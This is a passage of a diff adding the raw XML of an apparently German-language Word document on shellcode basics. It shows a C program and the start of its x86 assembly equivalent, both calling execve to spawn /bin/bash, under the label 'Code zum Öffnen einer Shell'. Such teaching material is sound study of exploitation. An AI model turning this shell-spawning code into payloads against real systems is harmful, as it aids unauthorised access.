+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>args</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>[1]=NULL;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>execve</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>args</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>[0],</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>args,NULL</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>exit</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(0);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>}</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="Textfeld 9" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:10.3pt;width:153.25pt;height:188.75pt;z-index:251664384;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
+                <v:fill opacity="52428f"/>
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>#</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>include</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> &lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>stdio.h</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>#</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>include</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> &lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>stdlib.h</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>main</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>()</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>{</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>char</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> *</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>args</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>[2];</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>args</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>[0]="/bin/</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>bash</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>";</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>args</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>[1]=NULL;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>execve</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>args</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>[0],</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>args,NULL</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>exit</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(0);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>}</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>3076575</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>247538</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="1828800" cy="343368"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:wrapNone/>
+                <wp:docPr id="11" name="Textfeld 11"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="1828800" cy="343368"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln w="6350">
+                          <a:noFill/>
+                        </a:ln>
+                        <a:effectLst/>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:lnRef>
+                        <a:fillRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="dk1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:r>
+                              <w:t>Code zum Öffnen einer Shell</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="Textfeld 11" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:242.25pt;margin-top:19.5pt;width:2in;height:27.05pt;z-index:251666432;visibility:visible;mso-wrap-style:square;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-height-percent:0;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f" strokeweight=".5pt">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:r>
+                        <w:t>Code zum Öffnen einer Shell</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift3"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Stack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> für </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>execve</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>() betrachten</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:object w:dxaOrig="8012" w:dyaOrig="9544">
+          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:356.05pt;height:423.3pt" o:ole="">
+            <v:imagedata r:id="rId16" o:title=""/>
+          </v:shape>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1411797915" r:id="rId17"/>
+        </w:object>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift3"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Assembler </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Equivalent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>225620</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>157606</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="3200400" cy="5140199"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="22860"/>
+                <wp:wrapNone/>
+                <wp:docPr id="12" name="Textfeld 12"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="3200400" cy="5140199"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:schemeClr val="bg1">
+                            <a:lumMod val="65000"/>
+                            <a:alpha val="80000"/>
+                          </a:schemeClr>
+                        </a:solidFill>
+                        <a:ln w="6350">
+                          <a:solidFill>
+                            <a:prstClr val="black"/>
+                          </a:solidFill>
+                        </a:ln>
+                        <a:effectLst/>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:lnRef>
+                        <a:fillRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="dk1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>.</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>data</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>Bash</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>:</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        .</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>asciz</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> "/bin/</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>bash</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>"</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    Null1:</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        .</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>int</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> 0</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>AddrToBash</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>:</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        .</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>int</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> 0</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    Null2:</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        .</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>int</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> 0</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>.</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>text</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    .</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>globl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> _</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>start</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>_</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>start</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>:</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    # </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>Execve</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>routine</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>movl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> $</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>Bash</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">, </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>AddrToBash</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>movl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> $11, %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>eax</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>movl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> $</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>Bash</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>, %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ebx</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>movl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> $</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>AddrToBash</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>, %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ecx</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>movl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> $Null2, %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>edx</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>int</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> $0x80</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    # Exit Routine</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    Exit:</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>movl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> $1, %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>eax</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>movl</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> $10, %</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>ebx</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
